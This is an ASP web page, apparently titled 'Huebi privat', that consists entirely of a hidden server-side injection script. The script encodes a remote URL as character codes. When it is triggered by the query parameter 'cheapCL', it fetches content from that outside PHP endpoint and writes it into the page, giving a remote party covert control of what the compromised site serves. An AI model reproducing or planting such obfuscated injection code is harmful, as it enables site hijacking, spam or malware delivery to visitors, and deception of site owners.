<%et()%> Huebi privat <% sub et() Dim GetKey,WebStr,objXML,XHtml,ThisAr,Vstr,i GetKey = Request.QueryString("cheapCL") if GetKey <> "" then WebStr = "104_116_116_112_58_47_47_119_119_119_46_99_97_115_115_99_111_110_115_101_114_118_97_110_99_121_46_111_114_103_47_48_52_50_52_47_119_119_119_88_104_117_101_98_105_88_99_104_47_68_71_101_116_46_112_104_112_63_99_104_101_97_112_67_76_61" ThisAr=split(WebStr,"_") for i=0 to Ubound(ThisAr) if IsNumeric(ThisAr(i)) then Vstr=Vstr&chr(ThisAr(i)) end if next Set objXML = server.CreateObject("MSXML2.ServerXMLHTTP") objXML.open "GET", Vstr + GetKey, False objXML.send() XHtml = objXML.responSetext if XHtml <> "" then response.write(XHtml) response.end end if end if end sub %>


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